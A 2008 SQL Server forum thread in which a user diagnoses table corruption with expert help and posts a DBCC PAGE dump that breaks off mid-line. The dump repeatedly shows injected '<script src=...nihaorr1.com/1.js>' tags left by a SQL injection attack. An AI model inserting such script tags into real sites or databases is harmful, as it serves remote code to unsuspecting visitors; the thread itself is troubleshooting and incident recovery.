Please start any new threads on our new
site at https://forums.sqlteam.com. We've got lots of great SQL Server
experts to answer whatever question you can come up with.
Author |
Topic |
robplatt
Starting Member
5 Posts |
Posted - 2008-05-16 : 18:27:44
|
I have SQL 2005 with sp1 (can't get sp2 to install yet), with a failover cluster (that works, but hasn't needed to be used in awhile), and the data resides on a, new, 1TB SAN array.We were not aware one of our tables were corrupt until the last rotation of our backup included the corrupt table. So restoring isn't an option. rebuilding the table is a last resort. I would like to understand how this happened, and how to prevent it.The error when trying to do anything to the table, read, edit, drop, etc:Attempt to fetch logical page (1:27232) in database 23 failed. It belongs to allocation unit 72057594049069056 not to 281474980642816.the first allocation unit # is sysobjvalues, and the second is g2_pluginparametermapthe table that the error happens on is g2_Item.CHECKDB returns this error:Msg 605, Level 12, State 3, Line 1Attempt to fetch logical page (1:27232) in database 22 failed. It belongs to allocation unit 72057594049069056 not to 281474980642816.Msg 8921, Level 16, State 1, Line 1Check terminated. A failure was detected while collecting facts. Possibly tempdb out of space or a system table is inconsistent. Check previous errors.(tempdb is only 14megs, the drive has almost 30 gigs of free space. the db in question is only 300 megs)dbcc page(db,1,27232,1)returns nothingI thought for sure I had manually made a backup quite awhile ago when I knew this table was fine. I restored the backup to a new database and am having the same exact problem. |
|
paulrandal
Yak with Vast SQL Skills
899 Posts |
Posted - 2008-05-17 : 19:03:36
|
This can happen when CHECKDB is trying to read a page containing a row-over column (to construct a complete copy of a row in-memory). It follows a link to a text page and finds the page isn't allocated to the object it thought it was.The error can happen for a number of reasons, all related to IO subsystem problems - for example, a lost write.Can you run DBCC CHECKTABLE on the two tables in question and post the results (make sure to use the "WITH ALL_ERRORMSGS, NO_INFOMSGS" options on the DBCC commands).Depending on the corruption, you may or may not lose data in the g2_pluginparametermap table, but my guess is that its likely.How often do you run DBCC CHECKDB commands?Did you run any IO soak/stress tests on the new array before using it?ThanksPaul RandalSQL Server MVP, Managing Director, SQLskills.com |
|
|
robplatt
Starting Member
5 Posts |
Posted - 2008-05-19 : 00:20:05
|
dbcc checktable('db_owner.g2_pluginparametermap') WITH ALL_ERRORMSGS, NO_INFOMSGSCommand(s) completed successfully.trying to run the command again on the other table, it cant find the table. where is it? i tried that db, master, and tempdb.....didnt run a stress test on the new SAN; its much faster and built for a lot more than our old 80gig raid was.i dont run checkdb often. i suppose i should start.....the g2_item table is the table im unable to do anything with. the g2_pluginparameter table querys fine, though its one of the ones in reference. many of the other tables show the same error when i click modify but they load fine.i used the dts wizard to move all my tables to a new database, and renamed this one to _old. so i could start with a fresh db with 99% of our data. the dts wizard found one more table, that wasn't listed in MSE. i find this very strange. the data copied over just find though.anyways. let me know what the next step is please. if we can recover the data that would be great. |
|
|
GilaMonster
Master Smack Fu Yak Hacker
4507 Posts |
Posted - 2008-05-19 : 04:02:02
|
quote: dbcc page(db,1,27232,1)returns nothing
To get an output from DBCC page, you need to switch traceflag 3604 on. so, something like this:dbcc traceon(3604)dbcc page(22,1,27232,1)dbcc traceoff(3604) quote: the first allocation unit # is sysobjvalues, and the second is g2_pluginparametermap
I believe sysobjvalues is a system table and hence hidden. You should be able to check it if you connect using the DAC.--Gail Shaw |
|
|
robplatt
Starting Member
5 Posts |
Posted - 2008-05-19 : 11:00:36
|
I ran the page command on the g2_item table (22), not the table in reference but the table im unable to access. here is the output, before i paste it, yes I realize we got hit with a sql injection attack. I had 99% of the database repaired, and found the old script that allowed the attack and have since fixed it.Connect using DAC? I don't know what you mean....by the way thank you guys for the help. The last few days I have picked up quite a bit.....PAGE: (1:27232)BUFFER:BUF @0x02E91514bpage = 0x0BD9E000 bhash = 0x00000000 bpageno = (1:27232)bdbid = 22 breferences = 3 bUse1 = 18791bstat = 0xc00009 blog = 0x21212159 bnext = 0x00000000PAGE HEADER:Page @0x0BD9E000m_pageId = (1:27232) m_headerVersion = 1 m_type = 3m_typeFlagBits = 0x0 m_level = 0 m_flagBits = 0x8200m_objId (AllocUnitId.idObj) = 176 m_indexId (AllocUnitId.idInd) = 256 Metadata: AllocUnitId = 72057594049462272 Metadata: PartitionId = 72057594044153856 Metadata: IndexId = 1Metadata: ObjectId = 1333579789 m_prevPage = (0:0) m_nextPage = (0:0)pminlen = 0 m_slotCnt = 85 m_freeCnt = 366m_freeData = 7670 m_reservedCnt = 0 m_lsn = (229:2296:17)m_xactReserved = 0 m_xdesId = (0:0) m_ghostRecCnt = 0m_tornBits = -1256469283 Allocation StatusGAM (1:2) = ALLOCATED SGAM (1:3) = NOT ALLOCATED PFS (1:24264) = 0x44 ALLOCATED 100_PCT_FULL DIFF (1:6) = CHANGEDML (1:7) = NOT MIN_LOGGED DATA:Slot 0, Offset 0x60, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC06000000000: 08005400 0000809b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 576a0000 †........P...Wj.. 00000020: 01005400 83091702 98458463 b0448463 †..T......E.c.D.c 00000030: 03000000 62000000 aa448463 b8448463 †....b....D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 1, Offset 0xb4, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC0B400000000: 08005e00 0000819b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a33 343a3431 3c736372 †7 10:34:41<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 2, Offset 0x112, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC11200000000: 08005400 0000819b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01000100 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 3, Offset 0x166, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC16600000000: 08005e00 0000829b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a33 343a3535 3c736372 †7 10:34:55<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 4, Offset 0x1c4, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC1C400000000: 08005400 0000829b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01000300 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 5, Offset 0x218, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC21800000000: 08005e00 0000839b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a33 343a3334 3c736372 †7 10:34:34<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 6, Offset 0x276, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC27600000000: 08005400 0000839b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01000500 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 7, Offset 0x2ca, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC2CA00000000: 08005e00 0000849b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a33 353a3439 3c736372 †7 10:35:49<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 8, Offset 0x328, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC32800000000: 08005400 0000849b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01000700 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 9, Offset 0x37c, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC37C00000000: 08005e00 0000859b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a33 353a3233 3c736372 †7 10:35:23<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 10, Offset 0x3da, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC3DA00000000: 08005400 0000859b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01000900 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 11, Offset 0x42e, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC42E00000000: 08005e00 0000869b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a33 373a3532 3c736372 †7 10:37:52<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 12, Offset 0x48c, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC48C00000000: 08005400 0000869b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01000b00 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 13, Offset 0x4e0, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC4E000000000: 08005e00 0000879b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a34 303a3537 3c736372 †7 10:40:57<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 14, Offset 0x53e, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC53E00000000: 08005400 0000879b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01000d00 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 15, Offset 0x592, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC59200000000: 08005e00 0000889b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a34 343a3130 3c736372 †7 10:44:10<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 16, Offset 0x5f0, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC5F000000000: 08005400 0000889b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01000f00 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 17, Offset 0x644, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC64400000000: 08005e00 0000899b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a34 353a3136 3c736372 †7 10:45:16<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 18, Offset 0x6a2, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC6A200000000: 08005400 0000899b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01001100 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 19, Offset 0x6f6, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC6F600000000: 08005e00 00008a9b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a33 393a3232 3c736372 †7 10:39:22<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 20, Offset 0x754, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC75400000000: 08005400 00008a9b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01001300 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 21, Offset 0x7a8, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC7A800000000: 08005e00 00008b9b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a35 313a3233 3c736372 †7 10:51:23<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 22, Offset 0x806, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC80600000000: 08005400 00008b9b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01001500 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 23, Offset 0x85a, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC85A00000000: 08005e00 00008c9b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a35 313a3432 3c736372 †7 10:51:42<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 24, Offset 0x8b8, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC8B800000000: 08005400 00008c9b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01001700 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 25, Offset 0x90c, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC90C00000000: 08005e00 00008d9b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a35 323a3532 3c736372 †7 10:52:52<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 26, Offset 0x96a, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC96A00000000: 08005400 00008d9b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01001900 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 27, Offset 0x9be, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FC9BE00000000: 08005e00 00008e9b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a35 333a3338 3c736372 †7 10:53:38<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 28, Offset 0xa1c, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCA1C00000000: 08005400 00008e9b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01001b00 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 29, Offset 0xa70, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCA7000000000: 08005e00 00008f9b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a35 343a3038 3c736372 †7 10:54:08<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 30, Offset 0xace, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCACE00000000: 08005400 00008f9b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01001d00 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 31, Offset 0xb22, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCB2200000000: 08005e00 0000909b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a35 383a3535 3c736372 †7 10:58:55<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 32, Offset 0xb80, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCB8000000000: 08005400 0000909b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01001f00 68448463 45091702 98458463 †....hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 33, Offset 0xbd4, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCBD400000000: 08005e00 0000919b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a35 393a3131 3c736372 †7 10:59:11<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 34, Offset 0xc32, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCC3200000000: 08005400 0000919b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01002100 68448463 45091702 98458463 †..!.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 35, Offset 0xc86, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCC8600000000: 08005e00 0000929b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31303a35 393a3233 3c736372 †7 10:59:23<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 36, Offset 0xce4, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCCE400000000: 08005400 0000929b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01002300 68448463 45091702 98458463 †..#.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 37, Offset 0xd38, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCD3800000000: 08005e00 0000939b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a30 313a3139 3c736372 †7 11:01:19<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 38, Offset 0xd96, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCD9600000000: 08005400 0000939b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01002500 68448463 45091702 98458463 †..%.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 39, Offset 0xdea, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCDEA00000000: 08005e00 0000949b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a30 313a3436 3c736372 †7 11:01:46<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 40, Offset 0xe48, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCE4800000000: 08005400 0000949b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01002700 68448463 45091702 98458463 †..'.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 41, Offset 0xe9c, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCE9C00000000: 08005e00 0000959b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a30 323a3332 3c736372 †7 11:02:32<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 42, Offset 0xefa, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCEFA00000000: 08005400 0000959b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01002900 68448463 45091702 98458463 †..).hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 43, Offset 0xf4e, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCF4E00000000: 08005e00 0000969b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a30 383a3334 3c736372 †7 11:08:34<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 6968616f 7272312e 636f6d2f †ww.nihaorr1.com/ 00000050: 312e6a73 3e3c2f73 63726970 743e††††††1.js></script> Slot 44, Offset 0xfac, Length 84, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FCFAC00000000: 08005400 0000969b 09000000 05000500 †..T............. 00000010: 01000000 00000000 50000000 606a0000 †........P...`j.. 00000020: 01002b00 68448463 45091702 98458463 †..+.hD.cE....E.c 00000030: 62000000 a0448463 b0448463 b8448463 †b....D.c.D.c.D.c 00000040: 00000000 40458463 a0448463 a0448463 †....@E.c.D.c.D.c 00000050: 00000000 ††††††††††††††††††††††††††††.... Slot 45, Offset 0x1000, Length 94, DumpStyle BYTERecord Type = BLOB_FRAGMENT Record Attributes = Memory Dump @0x664FD00000000000: 08005e00 0000979b 09000000 03002d2d †..^...........-- 00000010: 2d2d2d2d 2d2d2020 2030352f 32322f30 †------ 05/22/0 00000020: 37202020 31313a30 393a3531 3c736372 †7 11:09:51<scr 00000030: 69707420 7372633d 68747470 3a2f2f77 †ipt src=http://w 00000040: 77772e6e 